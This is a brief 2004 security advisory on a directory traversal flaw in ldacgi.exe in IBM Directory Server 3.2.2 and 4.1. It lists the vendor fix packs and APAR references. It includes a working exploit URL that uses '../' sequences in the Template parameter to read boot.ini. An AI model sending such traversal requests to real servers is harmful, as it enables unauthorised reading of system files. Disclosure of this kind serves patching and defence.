IBM Directory Server Directory Traversal Vulnerability ====================================================== First of all.... this issue was already known to IBM when i reported it, and a fix is available. But since it seems that there is no information about this vulnerability available on the web, i quickly want to show, how to exploit this btw. test your system for vulnerability! Vulnerable: =========== IBM Directory Server 3.2.2 and 4.1 The vulnerable part is ldacgi.exe Exploiting: =========== http://myserver/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252 Fix: ==== IDS v3.2.2 - fix pack 4; refer to APAR IR53631for detail IDS v4.1 - fix pack 3; refer to APAR IR52692 for detail Misc: ===== Vendor respondet within some hours to my mail - great! http://www.oliverkarow.de/research/IDS_directory_traversal.txt 26.07.2004